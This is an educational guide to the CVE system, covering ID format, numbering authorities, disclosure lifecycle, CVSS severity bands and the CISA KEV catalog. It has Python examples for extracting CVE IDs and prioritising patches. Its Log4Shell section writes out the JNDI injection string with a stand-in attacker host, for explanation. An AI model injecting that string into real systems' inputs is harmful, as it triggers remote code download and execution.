Every week, hundreds of security flaws are discovered in software you use every day — your browser, your VPN client, the server software behind your favourite websites. Without a standard way to name and track these flaws, the security world would be chaos. That is exactly what CVE solves.
This guide explains what CVE is, how a CVE ID works, who assigns them, and why understanding CVEs makes you a better IT professional.
What is a CVE?
CVE stands for Common Vulnerabilities and Exposures. It is a publicly available list of known security flaws — each one given a unique identifier so that security teams, software vendors, and researchers worldwide can talk about the exact same issue without confusion.
In simple terms: CVE is like a registry of every reported pothole on the internet. Each pothole gets a unique ID so everyone — from the driver who found it to the road crew fixing it — is talking about the same hole.
The CVE programme was launched in 1999 by the MITRE Corporation, a US non-profit that still operates it, with sponsorship from the US Department of Homeland Security through the Cybersecurity and Infrastructure Security Agency (CISA). Today it contains over 250,000 entries and grows by tens of thousands each year.
How a CVE ID works
Every CVE has an identifier in this format: CVE-YEAR-NUMBER
- CVE — the programme prefix
- YEAR — the year the ID was reserved by a CNA (or, for older entries, the year the flaw was made public); it is not necessarily the year the flaw was discovered or fixed
- NUMBER — a unique sequence number, four or more digits
Example: CVE-2021-44228 is the identifier for Log4Shell, one of the most critical vulnerabilities in history — a flaw in the Apache Log4j logging library that allowed remote code execution on millions of servers.
The number itself carries no severity information. It is purely a label. Severity comes from a separate scoring system (CVSS — covered below).
When a vendor or security blog mentions a CVE ID, look it up directly. The authoritative record lives at cve.org; the National Vulnerability Database at nvd.nist.gov mirrors it and adds the CVSS score, affected product versions, and links to advisories and patches, all in one place.
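As an added example (not code from the original page), here is a small Python parser and extractor for the CVE-YEAR-NUMBER format. It pulls every ID out of free text such as an advisory or a chat log, canonicalises case and zero-padding, rejects malformed IDs, and sorts numerically rather than lexicographically, which matters because CVE-2021-9999 and CVE-2021-44228 string-sort in the wrong order. The advisory text is constructed for the example, and CVE-2021-9999 in it is only a placeholder used to show the ordering.

```python
from __future__ import annotations

import re
from typing import NamedTuple

# Matches the CVE-YEAR-NUMBER format: four-digit year, then a sequence
# number of four or more digits. The \b anchors stop us matching inside a
# longer token such as "CVE-2021-44228a"; IGNORECASE catches the
# "cve-2021-44228" you see in chat logs and commit messages.
CVE_PATTERN = re.compile(r"\bCVE-(\d{4})-(\d{4,})\b", re.IGNORECASE)
FIRST_CVE_YEAR = 1999  # the programme started in 1999; earlier years are typos


class CveId(NamedTuple):
    year: int
    sequence: int

    def __str__(self) -> str:
        # Canonical form: upper-case prefix, sequence zero-padded to at
        # least four digits (CVE-2014-0160, not CVE-2014-160).
        return f"CVE-{self.year}-{self.sequence:04d}"


def parse_cve_id(text: str) -> CveId:
    """Parse exactly one CVE ID (surrounding whitespace allowed).

    Raises ValueError for anything that is not a well-formed identifier.
    """
    m = re.fullmatch(r"\s*CVE-(\d{4})-(\d{4,})\s*", text, re.IGNORECASE)
    if m is None:
        raise ValueError(f"not a CVE ID: {text!r}")
    year, sequence = int(m.group(1)), int(m.group(2))
    if year < FIRST_CVE_YEAR:
        raise ValueError(f"implausible CVE year {year} in {text!r}")
    return CveId(year, sequence)


def is_cve_id(text: str) -> bool:
    """True if `text` is a single well-formed CVE ID."""
    try:
        parse_cve_id(text)
        return True
    except ValueError:
        return False


def extract_cve_ids(text: str) -> list[str]:
    """Return the distinct CVE IDs mentioned in free text, canonicalised
    and ordered numerically by (year, sequence).

    Numeric ordering matters: a plain string sort puts CVE-2021-9999
    after CVE-2021-44228, because "9" > "4" as characters.
    """
    found = {
        CveId(int(y), int(s))
        for y, s in CVE_PATTERN.findall(text)
        if int(y) >= FIRST_CVE_YEAR
    }
    return [str(c) for c in sorted(found)]


# Constructed sample text in the style of a vendor advisory. CVE-2021-9999
# is a placeholder used only to demonstrate numeric ordering.
SAMPLE_ADVISORY = """
Log4j 2 advisories: cve-2021-44228 (Log4Shell), CVE-2021-45046 and CVE-2021-45105.
See also CVE-2021-9999 (placeholder) and the older CVE-2014-0160 (Heartbleed).
Malformed, must not match: CVE-21-44228, CVE-2021-123, CVE-2021-44228a.
"""

if __name__ == "__main__":
    for cve in extract_cve_ids(SAMPLE_ADVISORY):
        print(cve)
```

Run it and the five valid IDs print in (year, sequence) order with CVE-2021-9999 before CVE-2021-44228; the three malformed tokens on the last line are ignored.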
Who assigns CVEs?
CVE IDs are not assigned by one central team. They are assigned by a network of approved organisations called CVE Numbering Authorities (CNAs).
CNAs include:
- Major vendors — Microsoft, Google, Apple, Red Hat, and hundreds of others can assign CVE IDs for vulnerabilities in their own products
- Bug bounty platforms — HackerOne and Bugcrowd can assign IDs for vulnerabilities reported through their programmes
- MITRE Corporation — acts as the CNA of last resort for anything that does not fall within another CNA's scope
A researcher who finds a vulnerability reports it to the relevant CNA. The CNA reviews it, assigns a CVE ID, and publishes a description once it is safe to do so (after a patch is released or a disclosure deadline passes).
The CVE lifecycle
A CVE does not appear overnight. It goes through several stages:
- Discovery — a researcher or vendor finds a flaw in software
- Private disclosure — the researcher reports it to the vendor (responsible disclosure) or directly to a CNA
- CVE reserved — the CNA reserves a CVE ID, which may appear as "RESERVED" in public databases while a fix is being developed
- Patch developed — the vendor builds and tests a fix
- Public disclosure — the CVE is published along with the patch; users are notified to update
- NVD enrichment — the National Vulnerability Database adds CVSS scores, affected versions, and references
The window between the private report and public disclosure is called the embargo period. A 90-day deadline, popularised by Google's Project Zero, is the most widely used convention, though vendors and researchers negotiate shorter or longer windows; the point is to give the vendor time to ship a patch before the details become public.
A real-world example: Log4Shell
On 9 December 2021, CVE-2021-44228, soon nicknamed Log4Shell, became public, about two weeks after a researcher at Alibaba Cloud had reported it privately to the Apache Log4j team. The flaw was in Apache Log4j 2, a Java logging library embedded in thousands of enterprise applications and services, including ones run by Amazon, Apple (iCloud), Cloudflare, and Valve (Steam).
The vulnerability allowed an attacker to place a single crafted string, of the form ${jndi:ldap://attacker-host/x}, in any value the application logged (a username, a User-Agent header, a chat message) and have Log4j's JNDI lookup feature fetch and execute code from a server the attacker controlled. No authentication was required.
Its CVSS score was 10.0, Critical, the highest possible. Within hours of publication attackers were mass-scanning the internet for vulnerable servers, and security teams worldwide dropped everything to patch.
This is why CVEs matter: a single vulnerability in one widely-used library can expose millions of systems simultaneously.
CVE vs CVSS — what is the difference?
These two terms are often confused:
- CVE — the name (identifier) of a vulnerability. It tells you what the flaw is.
- CVSS (Common Vulnerability Scoring System) — the score (0.0–10.0) that measures how severe the flaw is. The base score combines exploitability metrics (attack vector, attack complexity, privileges required, user interaction) with impact metrics (confidentiality, integrity, availability). Whether a patch exists only enters the optional temporal/threat metrics, so the base score you see in NVD does not drop when a fix ships.
Think of it this way: CVE is the name on the patient's file; CVSS is the triage score that tells the doctor how urgently to treat them.
Severity bands:
- Critical 9.0–10.0 — patch immediately
- High 7.0–8.9 — patch this week
- Medium 4.0–6.9 — patch in your next cycle
- Low 0.1–3.9 — monitor and patch when convenient
Why CVEs matter to you
Even if you are not a security researcher, CVEs affect your daily work:
- System administrators — patch management relies on CVE feeds. Distribution security advisories and package managers reference CVEs: dnf and yum can list pending updates by CVE ID (dnf updateinfo list --with-cve), the Debian and Ubuntu security trackers are indexed by CVE, and Microsoft's Security Update Guide maps each Patch Tuesday update to the CVEs it fixes.
- Developers — libraries you include in your project may have known CVEs. Tools like npm audit, pip-audit, and GitHub's Dependabot check your dependency tree against CVE data automatically.
- IT managers — compliance frameworks (ISO 27001, SOC 2, PCI DSS) require a vulnerability management process, and PCI DSS in particular sets deadlines for applying critical security patches.
- Everyone — when your browser or OS asks you to update, there is almost always a CVE fix involved.
Subscribe to the CISA Known Exploited Vulnerabilities (KEV) Catalog at cisa.gov/kev. It lists CVEs that are being actively exploited right now — these are the ones that need immediate attention, before attackers reach your systems.
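The obvious next step is to let KEV drive your patch order. The added example below (not the page's code) parses a feed in the KEV JSON schema, matches it against a list of (CVE ID, CVSS score) findings such as a scanner would export, and orders them: entries already past their CISA due date first, other KEV entries next by due date, everything else by CVSS. The catalog excerpt and the findings are constructed for the example; the CVE-2099-xxxx IDs are synthetic placeholders, the dates are illustrative, and absence of a CVE from the excerpt implies nothing about the live catalog.

```python
from __future__ import annotations

import json
from datetime import date

# Constructed excerpt in the schema of CISA's KEV JSON feed, which is
# published at
# https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
# Values are illustrative, not copied from the live catalog; CVE-2099-0001 is
# a synthetic placeholder. The live catalog is far larger, so absence from
# this excerpt says nothing about a real CVE.
KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities (excerpt)",
    "catalogVersion": "example",
    "dateReleased": "2022-01-14T00:00:00.0000Z",
    "count": 2,
    "vulnerabilities": [
        {
            "cveID": "CVE-2021-44228",
            "vendorProject": "Apache",
            "product": "Log4j2",
            "vulnerabilityName": "Apache Log4j2 Remote Code Execution Vulnerability",
            "dateAdded": "2021-12-10",
            "shortDescription": "JNDI features in Log4j2 allow remote code execution.",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2021-12-24",
            "knownRansomwareCampaignUse": "Known",
            "notes": "",
        },
        {
            "cveID": "CVE-2099-0001",
            "vendorProject": "ExampleCorp",
            "product": "Example Gateway",
            "vulnerabilityName": "Example Gateway Authentication Bypass (synthetic)",
            "dateAdded": "2022-01-12",
            "shortDescription": "Synthetic entry for the example.",
            "requiredAction": "Apply updates per vendor instructions.",
            "dueDate": "2022-02-01",
            "knownRansomwareCampaignUse": "Unknown",
            "notes": "",
        },
    ],
})

# Constructed scanner output: (CVE ID, CVSS base score). Case is deliberately
# inconsistent, as it often is in real exports.
FINDINGS = [
    ("cve-2099-0002", 5.3),
    ("CVE-2021-44228", 10.0),
    ("CVE-2099-0001", 7.5),
    ("CVE-2099-0003", 9.1),
]

# "Today" for the example, chosen so that one KEV entry is overdue and one is not.
REFERENCE_DATE = date(2022, 1, 15)


def load_kev(feed_json: str) -> dict[str, dict]:
    """Index a KEV feed by upper-case CVE ID."""
    feed = json.loads(feed_json)
    return {v["cveID"].upper(): v for v in feed["vulnerabilities"]}


def band(score: float) -> str:
    """CVSS v3 qualitative band for a base score."""
    for limit, name in ((0.0, "None"), (3.9, "Low"), (6.9, "Medium"), (8.9, "High")):
        if score <= limit:
            return name
    return "Critical"


def prioritise(findings: list[tuple[str, float]], kev: dict[str, dict],
               today: date) -> list[tuple[str, str, str]]:
    """Order findings for remediation.

    Returns (cve_id, label, action) tuples: KEV entries already past their
    CISA due date first (earliest due date first), then other KEV entries by
    due date, then everything else by descending CVSS. The label is
    "KEV overdue", "KEV" or the CVSS band.
    """
    rows = []
    for cve_id, cvss in findings:
        cve_id = cve_id.upper()
        entry = kev.get(cve_id)
        if entry is None:
            rows.append(((2, 0, -cvss, cve_id), (cve_id, band(cvss), "patch per severity band")))
            continue
        due = date.fromisoformat(entry["dueDate"])
        overdue = due < today
        key = (0 if overdue else 1, due.toordinal(), -cvss, cve_id)
        label = "KEV overdue" if overdue else "KEV"
        action = f'{entry["requiredAction"]} (due {entry["dueDate"]})'
        rows.append((key, (cve_id, label, action)))
    rows.sort(key=lambda r: r[0])
    return [r[1] for r in rows]


if __name__ == "__main__":
    for cve_id, label, action in prioritise(FINDINGS, load_kev(KEV_SAMPLE), REFERENCE_DATE):
        print(f"{label:12} {cve_id:15} {action}")
```

In production, replace KEV_SAMPLE with the live feed (URL in the comment) fetched on a schedule, and feed in findings from pip-audit --format json or your scanner's export. Note that the KEV entry with CVSS 7.5 outranks the non-KEV finding with CVSS 9.1: confirmed exploitation beats a higher theoretical score.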
Frequently asked questions
What does CVE stand for?
CVE stands for Common Vulnerabilities and Exposures. It is a standardised list of publicly known security flaws in software and hardware, maintained by MITRE Corporation.
Who assigns CVE IDs?
CVE IDs are assigned by CVE Numbering Authorities (CNAs) — approved organisations that include major vendors (Microsoft, Google, Apple), bug bounty platforms (HackerOne), and MITRE itself as the CNA of last resort.
Is every CVE dangerous?
No. Most CVEs receive a CVSS score from 0.0 to 10.0, and a score below 4.0 is Low severity. Many CVEs have patches available before they are ever exploited in the wild. Focus your urgency on Critical and High scores, especially those appearing in the CISA KEV catalog.
How do I know if my software has a CVE?
Search the National Vulnerability Database at nvd.nist.gov by product name. For code dependencies, run npm audit (Node.js), pip-audit (Python), or enable Dependabot on GitHub to get automatic alerts.